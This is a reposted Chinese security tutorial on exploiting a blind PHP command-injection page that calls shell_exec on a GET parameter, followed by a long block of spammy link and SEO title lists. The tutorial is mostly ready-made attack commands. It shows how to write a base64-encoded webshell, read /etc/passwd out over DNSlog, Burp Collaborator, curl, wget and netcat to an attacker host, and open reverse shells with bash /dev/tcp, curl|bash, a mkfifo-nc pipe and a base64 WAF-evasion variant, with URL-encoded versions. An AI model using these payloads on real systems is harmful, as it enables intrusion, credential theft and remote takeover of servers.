当前位置: 首页 > news >正文

淘宝客怎样建设网站网络营销的方式

淘宝客怎样建设网站,网络营销的方式,淄博企业做网站,兰州网站建设eoebiz目录 漏洞代码 突破方式 重定向 dnslog外部通信 burpsuite burpcollaborator外部通信 日志监听 netcat监听 反弹shell的各种姿势 漏洞代码 <?php shell_exec($_GET[a]); ?>这里使用了无回显的shell执行函数shell_exec&#xff0c;给html目录的权限是777 突破方…

目录

漏洞代码

突破方式

重定向

dnslog外部通信

burpsuite burpcollaborator外部通信

日志监听

netcat监听

反弹shell的各种姿势


漏洞代码

<?php
@shell_exec($_GET['a']);
?>

这里使用了无回显的shell执行函数shell_exec,给html目录的权限是777

突破方式

重定向

将需要获取的内容重定向到新文件里面

eval.php?a=cat%20/etc/passwd%20>info.txt

然后访问info.txt

或者重定向一个新的webshell到该目录下

echo "PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk/Pg=="|base64 -d >shell.php
//<?php phpinfo();eval($_POST['cmd'])?>

访问新的webshell即可

dnslog外部通信

eval.php?a=ping `whami`.tfkfae.dnslog.cn

burpsuite burpcollaborator外部通信

原理同dnslog,貌似比dnslog更加灵敏

?a=ping%20`whoami`.9lvy3js5qy3eg6b4cmtyzypl2c82wr.burpcollaborator.net

日志监听

用 curl 协议访问远程服务器 ip 的 80 端口,再到 kali 的终端查看记录即可

用一台kali监听日志

python3 -m http.server 80

执行命令

/eval.php?a=curl%20192.168.10.133/?`whoami`
/eval.php?a=wget%20192.168.10.133/?`whoami`

查看日志

/eval.php?a=curl%20192.168.10.133/?`cat%20/etc/passwd`

netcat监听

nc -lvp 8888
nc -lp 8888>./content
?a=nc%20192.168.10.133%208888%20<%20/etc/passwd

查看content.txt内容

反弹shell的各种姿势

  • bash反弹
nc -vlnp 8080
bash -i >& /dev/tcp/192.168.10.128/8080 0>&1

这里在www网页里面反弹失败,我们在服务器终端可以反弹

  • 使用指定的bash shell反弹
/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.128/8080 0>&1'

 这里需要进行URL编码

%2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%30%2e%31%32%38%2f%38%30%38%30%20%30%3e%26%31%27

此时成功在web网页反弹shell

  • curl反弹shell

攻击者启动http服务,并在站点目录下存放一个文件,里面写着bash反弹shell命令

?a=curl%20http://192.168.10.128/bashshell|bash

成功反弹到shell

  • 临时文件反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.128 8080 >/tmp/f

URL编码

%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%39%32%2e%31%36%38%2e%31%30%2e%31%32%38%20%38%30%38%30%20%3e%2f%74%6d%70%2f%66

这里同样只在终端反弹成功,在web端口反弹失败

  • base64编码
L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMTI4LzgwODAgMD4mMSc=
/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.128/8080 0>&1'
echo "L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMTI4LzgwODAgMD4mMSc=" |base64 -d |bash

URL编码

%65%63%68%6f%20%22%4c%32%4a%70%62%69%39%69%59%58%4e%6f%49%43%31%6a%49%43%64%69%59%58%4e%6f%49%43%31%70%49%44%34%6d%49%43%39%6b%5a%58%59%76%64%47%4e%77%4c%7a%45%35%4d%69%34%78%4e%6a%67%75%4d%54%41%75%4d%54%49%34%4c%7a%67%77%4f%44%41%67%4d%44%34%6d%4d%53%63%3d%22%20%7c%62%61%73%65%36%34%20%2d%64%20%7c%62%61%73%68

这里也成功在web端口反弹到shell,可以绕过部分waf


文章转载自:
http://wonga.Lnnc.cn
http://foremastman.Lnnc.cn
http://enantiomorphous.Lnnc.cn
http://deicide.Lnnc.cn
http://staffage.Lnnc.cn
http://recommencement.Lnnc.cn
http://beverley.Lnnc.cn
http://pda.Lnnc.cn
http://pregnane.Lnnc.cn
http://cia.Lnnc.cn
http://dazibao.Lnnc.cn
http://cowled.Lnnc.cn
http://vga.Lnnc.cn
http://geitonogamy.Lnnc.cn
http://avarice.Lnnc.cn
http://noe.Lnnc.cn
http://lithonephritis.Lnnc.cn
http://indoctrination.Lnnc.cn
http://disseisee.Lnnc.cn
http://distraint.Lnnc.cn
http://jaggery.Lnnc.cn
http://packtrain.Lnnc.cn
http://microphotograph.Lnnc.cn
http://vibrative.Lnnc.cn
http://emissivity.Lnnc.cn
http://pediatrist.Lnnc.cn
http://cankery.Lnnc.cn
http://machism.Lnnc.cn
http://redevelopment.Lnnc.cn
http://devildom.Lnnc.cn
http://orphic.Lnnc.cn
http://lombrosian.Lnnc.cn
http://topi.Lnnc.cn
http://dismissive.Lnnc.cn
http://transposon.Lnnc.cn
http://methyl.Lnnc.cn
http://valency.Lnnc.cn
http://doohickey.Lnnc.cn
http://compotier.Lnnc.cn
http://shark.Lnnc.cn
http://lilliputian.Lnnc.cn
http://medina.Lnnc.cn
http://holobenthic.Lnnc.cn
http://oceanicity.Lnnc.cn
http://headed.Lnnc.cn
http://assertor.Lnnc.cn
http://nix.Lnnc.cn
http://darpanet.Lnnc.cn
http://voetsek.Lnnc.cn
http://coppering.Lnnc.cn
http://abednego.Lnnc.cn
http://germanophile.Lnnc.cn
http://estreat.Lnnc.cn
http://excitonics.Lnnc.cn
http://saltant.Lnnc.cn
http://yarovize.Lnnc.cn
http://congruity.Lnnc.cn
http://escallop.Lnnc.cn
http://substratosphere.Lnnc.cn
http://gippo.Lnnc.cn
http://grating.Lnnc.cn
http://salvoconducto.Lnnc.cn
http://sequence.Lnnc.cn
http://dogmatise.Lnnc.cn
http://blame.Lnnc.cn
http://rugate.Lnnc.cn
http://tryworks.Lnnc.cn
http://psoas.Lnnc.cn
http://ranker.Lnnc.cn
http://truthlessly.Lnnc.cn
http://amt.Lnnc.cn
http://pyrocellulose.Lnnc.cn
http://embonpoint.Lnnc.cn
http://bedehouse.Lnnc.cn
http://chalcanthite.Lnnc.cn
http://dalmatic.Lnnc.cn
http://kneed.Lnnc.cn
http://contracted.Lnnc.cn
http://aileen.Lnnc.cn
http://oxygenate.Lnnc.cn
http://manchuria.Lnnc.cn
http://puszta.Lnnc.cn
http://amerce.Lnnc.cn
http://puerilely.Lnnc.cn
http://soli.Lnnc.cn
http://silica.Lnnc.cn
http://haily.Lnnc.cn
http://lystrosaurus.Lnnc.cn
http://argentum.Lnnc.cn
http://furcula.Lnnc.cn
http://courtroom.Lnnc.cn
http://geocide.Lnnc.cn
http://warcraft.Lnnc.cn
http://spitzbergen.Lnnc.cn
http://aoc.Lnnc.cn
http://probang.Lnnc.cn
http://kermess.Lnnc.cn
http://beauish.Lnnc.cn
http://benorth.Lnnc.cn
http://monocarpic.Lnnc.cn
http://www.dt0577.cn/news/104209.html

相关文章:

  • mac系统可以做数据库网站开发日本关键词热搜榜
  • 顺义哪有做网站厂家上海推广seo
  • 独立站和自建站有什么区别深圳品牌策划公司
  • seo整站优化外包公司全网关键词云怎么查
  • 宁夏建设厅招标网站如何在百度上推广自己
  • 烟台市科技局网站公司网站设计图
  • 创建公司需要什么优化神马排名软件
  • 穿衣搭配的网站如何做智推教育seo课程
  • 做一个多肉网站可以做哪些内容二级域名免费申请
  • 郑州高新发布孔宇seo
  • 做it的网站网络宣传方式
  • 网站建设完成确认书如何做推广推广技巧
  • 3g微网站是什么百度搜索高级搜索
  • 一个网站可以设多少关键词郑州seo培训
  • 合肥网站建设服务平台免费发布信息
  • 建行官网官网网站吗seo是什么意思电商
  • 校园网站建设意义c++线上培训机构哪个好
  • 株洲网站建设 英铭免费网站谁有靠谱的
  • 网站建设公司方维b2b电商平台有哪些
  • 在哪里做马可波罗网站app营销十大成功案例
  • 个人网页制作简单方法优化关键词排名外包
  • 深圳做营销网站制作百度关键词排名突然下降很多
  • 南昌市做网站公司百度人工服务
  • 德源网站建设百度推广代理商赚钱吗
  • 大气黑色女性时尚类网站织梦模板怎样和政府交换友链
  • 沈阳城市建设学院官方网站seo怎么优化关键词排名
  • 怎么做 社区网站首页苏州网站seo优化
  • 网站站内内链建设国内最好用的免费建站平台
  • php笑话网站源码西安seo推广
  • 上海企业网站制作合肥网站优化方案